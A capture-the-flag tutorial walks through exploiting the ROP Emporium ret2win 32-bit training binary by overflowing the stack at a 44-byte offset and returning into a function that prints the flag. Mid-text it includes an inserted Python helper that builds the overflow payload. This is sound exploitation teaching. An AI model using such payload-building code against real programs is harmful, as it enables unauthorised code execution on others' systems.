ROP ROP #1

Before you proceed any further, make sure you have all the requirements fulfilled.

  • ASM knowledge
  • Debugger familiarity
  • GDB
  • Basic ROP knowledge
  • Brain

Setup

In this post, we will try to learn ROP (Return Oriented Programming) using the ROP Emporium ret2win 32-bit binary. Let's set up our machine for debugging by installing PEDA and downloading the target binary.

We have downloaded the binary and extracted it, time to start gdb.

Crash

We have found the offset at 44, which means the next 4 bytes of our input land in EIP. We will use a custom boilerplate to ease our exploit development for this binary, which can be found in the final exploit.

Flag

This binary is pretty easy to exploit since it imports the system function and has the '/bin/cat flag.txt' string inside the data section. Let's analyze this binary in a disassembler. I will be using Hopper Disassembler for this; however, you can simply type 'pdisass ret2win' inside gdb (with PEDA loaded) to view the same results.

We can see that the ret2win function in this binary itself pushes the address of the string '/bin/cat flag.txt' onto the stack and then calls system(), which is very helpful for our objective. We will simply point the saved return address at the start of ret2win and be done with it.
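As an added example (not the post's own boilerplate), here is a small Python helper that covers the two steps above: recovering the EIP offset from the value a PEDA-style cyclic pattern leaves in EIP after the crash, and building the padding-plus-address payload. The ret2win address is a placeholder to be replaced with what gdb reports; the 49-byte input limit is the author's observation later in the post.

```python
import string
import struct
from itertools import product

# Placeholder (constructed): take the real address from gdb ("p ret2win")
# before using this against the binary.
RET2WIN_ADDR = 0xDEADBEEF
OFFSET_TO_EIP = 44   # found via the crash, as described in the post
INPUT_LIMIT = 49     # the author observed input being truncated after 49 bytes


def cyclic_pattern(length: int) -> bytes:
    """Metasploit/PEDA-style pattern 'Aa0Aa1Aa2...': every 4-byte window is
    unique, so the value that lands in EIP identifies its own position."""
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        out += f"{upper}{lower}{digit}".encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 200) -> int:
    """Given the 32-bit value gdb shows in EIP after the crash, return the
    byte offset in the pattern it came from (-1 if not found)."""
    needle = struct.pack("<I", eip_value)   # EIP was loaded little-endian
    return cyclic_pattern(length).find(needle)


def build_payload(ret2win_addr: int = RET2WIN_ADDR,
                  offset: int = OFFSET_TO_EIP) -> bytes:
    """Padding up to the saved return address, then ret2win's address, so the
    vulnerable function 'returns' into ret2win (which itself calls system)."""
    return b"A" * offset + struct.pack("<I", ret2win_addr)


def fits_input_limit(payload: bytes, limit: int = INPUT_LIMIT) -> bool:
    """Sanity check: anything past what the binary reads is silently dropped."""
    return len(payload) <= limit


if __name__ == "__main__":
    # Simulated crash: the bytes at offset 44..47 are what EIP would hold.
    crash_eip = struct.unpack("<I", cyclic_pattern(200)[44:48])[0]
    print(f"EIP {crash_eip:#x} -> offset {pattern_offset(crash_eip)}")
    payload = build_payload()
    print(f"{len(payload)} bytes, fits limit: {fits_input_limit(payload)}")
```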

We got the flag, which is the main objective. I tried to find a way to spawn a shell but didn't find any useful ROP gadgets to do so; our input is truncated after 49 bytes, I guess, so we only get a 1-byte overwrite on the stack after our return-pointer overwrite.

——END——
